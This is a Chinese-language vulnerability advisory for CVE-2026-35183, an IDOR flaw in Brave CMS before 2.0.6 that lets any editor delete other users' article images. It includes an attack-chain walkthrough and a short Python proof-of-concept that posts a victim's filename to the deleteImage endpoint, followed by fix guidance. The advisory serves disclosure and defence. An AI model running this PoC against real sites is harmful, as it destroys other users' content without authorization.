IPBUF安全漏洞报告
English
CVE-2026-35183 CVSS 7.1 高危

CVE-2026-35183 Brave CMS IDOR漏洞

披露日期: 2026-04-06

漏洞信息

漏洞编号
CVE-2026-35183
漏洞类型
不安全的直接对象引用
CVSS评分
7.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Brave CMS

相关标签

IDORBrave CMS权限绕过文件删除

漏洞概述

Brave CMS是一款开源的内容管理系统。在2.0.6版本之前,该系统存在一个严重的不安全的直接对象引用(IDOR)漏洞。该漏洞位于文章图片删除功能中,具体在`ArticleController.php`文件的`deleteImage`方法内。由于系统在处理删除请求时仅从URL中获取文件名,而未验证请求者是否拥有该图片或关联文章的所有权,导致任何拥有编辑权限的经过身份验证的用户都可以删除其他用户文章所附带的图片。该漏洞已在2.0.6版本中修复。

技术细节

该漏洞的根本原因在于服务器端缺乏有效的访问控制验证。具体来说,在`app/Http/Controllers/Dashboard/ArticleController.php`的`deleteImage`方法中,应用程序直接从HTTP请求参数中提取目标图片的文件名,并执行删除操作,而未检查当前用户是否为该图片所属文章的所有者。攻击者只需拥有基本的编辑权限,即可通过构造恶意的HTTP请求,指定受害者的图片文件名进行删除。这种IDOR漏洞允许攻击者通过修改请求中的标识符(如文件名或ID)来访问或操作本无权访问的数据,从而导致数据完整性受损和潜在的拒绝服务。

攻击链分析

STEP 1
1. 身份认证
攻击者使用拥有编辑权限的低权限账户登录Brave CMS系统。
STEP 2
2. 识别端点
分析应用请求,确认文章图片删除接口位于`/dashboard/articles/deleteImage`,且接受`filename`参数。
STEP 3
3. 构造攻击请求
攻击者猜测或获取其他用户文章的图片文件名,并将其作为参数填入删除请求中。
STEP 4
4. 执行未授权操作
服务器端未校验所有权,直接执行删除操作,导致受害者的图片被移除。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Configuration target_url = "http://target-brave-cms.com/dashboard/articles/deleteImage" attacker_session_cookie = "valid_session_cookie_here" # The filename of the image belonging to another user victim_image_filename = "victim_article_banner.jpg" # Headers headers = { "Cookie": f"session={attacker_session_cookie}", "User-Agent": "Mozilla/5.0" } # Payload data (method may vary based on implementation, assuming GET/POST param) payload = { "filename": victim_image_filename } try: # Send the malicious request response = requests.post(target_url, data=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Image deleted.") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

Brave CMS < 2.0.6

防御指南

临时缓解措施
建议立即将系统升级至2.0.6版本以彻底修复此漏洞。如果暂时无法升级,应在应用网关层面实施严格的访问控制策略,或修改后端代码,在执行文件系统删除操作前,强制检查当前会话用户ID与文章所有者ID的一致性。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表